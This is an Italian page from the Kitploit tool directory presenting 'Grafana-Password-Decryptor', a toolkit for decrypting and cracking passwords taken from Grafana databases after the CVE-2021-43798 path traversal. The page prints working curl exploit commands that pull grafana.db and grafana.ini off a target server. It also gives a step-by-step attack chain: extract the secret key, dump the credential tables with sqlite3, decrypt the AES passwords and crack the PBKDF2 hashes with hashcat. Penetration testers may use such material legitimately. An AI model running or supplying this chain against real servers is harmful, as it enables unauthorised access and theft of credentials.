Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Grafana-Password-Decryptor — Toolkit Python per decifrare AES-256 e craccare password PBKDF2 da database Grafana, solitamente abbinato a (CVE-2021-43798). | Kitploit
Strumenti/GitHubGitHub/strikoder-premium/grafana-password-decryptor
Password CrackingStrumenti di Crittografia/DecrittografiaAnalisi delle VulnerabilitàExploitPost-ExploitCrittografia
GitHubstrikoder-premium/grafana-password-decryptor

Grafana-Password-Decryptor

Toolkit Python per decifrare AES-256 e craccare password PBKDF2 da database Grafana, solitamente abbinato a (CVE-2021-43798).

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
18 mesi faNon ancora revisionato

Decifratore di Password Grafana

Toolkit Python per decifrare e craccare le password di Grafana da più formati.

Realizzato da: strikoder

Cosa Fa Questo Strumento?

Gestisce due tipi di archiviazione delle password di Grafana:

  • 🔐 AES-256 Base64 (tabella data_source) → Decifra direttamente con AESDecrypt.py
  • 🔨 PBKDF2_HMAC_SHA256 (tabella user) → Converti per Hashcat con grafana2hashcat.py

Perfetto per la post-esploitazione dopo il path traversal di CVE-2021-43798.

Cos'è CVE-2021-43798?

Una vulnerabilità di path traversal nelle versioni di Grafana dalla 8.0.0-beta1 alla 8.3.0 che consente a attaccanti non autenticati di leggere file arbitrari dal server, inclusi:

  • File di configurazione (/etc/grafana/grafana.ini)
  • File del database (/var/lib/grafana/grafana.db)
  • File di sistema (/etc/passwd)

Esempio di exploit:

root@kitploit:~
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is --output grafana.db

Questo toolkit completa la catena d'attacco decifrando/craccando le password estratte dal database.

Strumenti Inclusi

1. AESDecrypt.py

Decifra le password cifrate con AES-256 dalla tabella data_source.

Basato su: jas502n/Grafana-CVE-2021-43798 con miglioramenti chiave:

  • ✅ Chiave Segreta Flessibile: Estrai la chiave manualmente (nessun percorso hardcoded)
  • ✅ Elaborazione in Lotti: Decifra più hash da un file
  • ✅ Completamente Configurabile: Tutti i parametri tramite flag CLI

2. grafana2hashcat.py

Converte gli hash Grafana PBKDF2_HMAC_SHA256 dalla tabella user in un formato compatibile con Hashcat per il cracking delle password.

Crediti: iamaldi/grafana2hashcat

Installazione

root@kitploit:~
git clone https://github.com/strikoder/Grafana-Password-Decryptor.git
cd Grafana-Password-Decryptor
pip install cryptography #for Decyrption
chmod +x AESDecrypt.py grafana2hashcat.py

Utilizzo

Strumento 1: AESDecrypt.py (per password AES-256 Base64)

Decifra un Singolo Hash

root@kitploit:~
python3 AESDecrypt.py -hash R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==

Decifra Più Hash

root@kitploit:~
python3 AESDecrypt.py -f hashes.txt

Utilizzo di una Chiave Segreta Personalizzata

Estrai la chiave segreta dalla configurazione di Grafana:

root@kitploit:~
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../etc/grafana/grafana.ini' --path-as-is | grep secret_key

python3 AESDecrypt.py -hash [HASH] -k YOUR_SECRET_KEY

Strumento 2: grafana2hashcat.py (per hash PBKDF2)

Converti un Singolo File di Hash

root@kitploit:~
python3 grafana2hashcat.py grafana_hashes.txt

Formato di input (grafana_hashes.txt):

root@kitploit:~
hash1,salt1
hash2,salt2
hash3,salt3

Output (pronto per Hashcat):

root@kitploit:~
sha256:10000:base64_salt:base64_hash

Salva su File

root@kitploit:~
python3 grafana2hashcat.py grafana_hashes.txt -o hashcat_hashes.txt

Cracca con Hashcat

root@kitploit:~
hashcat -m 10900 hashcat_hashes.txt wordlist.txt

Esempio Completo di Sfruttamento

Scenario 1: Password Cifrate AES (tabella data_source)

root@kitploit:~
# 1. Extract secret key from grafana.ini (might be empty in some cases, use default key in python program in that case)
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../etc/grafana/grafana.ini' \
  --path-as-is | grep secret_key

# 2. Download the database
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is -o grafana.db

# 3. Extract AES-encrypted passwords from data_source table
sqlite3 grafana.db "SELECT name, password FROM data_source;"

# 4. Save passwords to file (one per line)
# Example: R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==

# 5. Decrypt with extracted secret key
python3 AESDecrypt.py -f passwords.txt -k [SECRET_KEY]

Scenario 2: Hash PBKDF2 (tabella user)

root@kitploit:~
# 0. Download the database
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is -o grafana.db

# 1. Extract PBKDF2 password hashes from user table
sqlite3 grafana.db "SELECT login, password, salt FROM user;"

# 2. Format hashes for grafana2hashcat (hash,salt format)
# Example format in grafana_hashes.txt:
# 3ad31dc57a7452c442f259cfff7aa61f2a6cea88ee634724ae146e221ae4e01c56c8bcbb3552310acd2fd746a396d2f99bf8,pepper

# 3. Convert to Hashcat format
python3 grafana2hashcat.py grafana_hashes.txt -o hashcat_hashes.txt

# 4. Crack with Hashcat (mode 10900 = PBKDF2-HMAC-SHA256)
hashcat -m 10900 hashcat_hashes.txt rockyou.txt

Riferimento Rapido: Quale Strumento Usare?

Crediti

  • AESDecrypt.py: Realizzato da strikoder, basato sull'implementazione Go di jas502n
  • grafana2hashcat.py: Creato da iamaldi

⭐ Trovato utile? Lascia una stella!

Realizzato da strikoder

Scarica lo strumento
Tipo di PasswordTabella del DatabaseFormatoStrumentoModalità Hashcat
Cifrato AES-256data_sourceStringa Base64AESDecrypt.pyN/A (decifratura diretta)
PBKDF2_HMAC_SHA256userHash hex + saltgrafana2hashcat.py-m 10900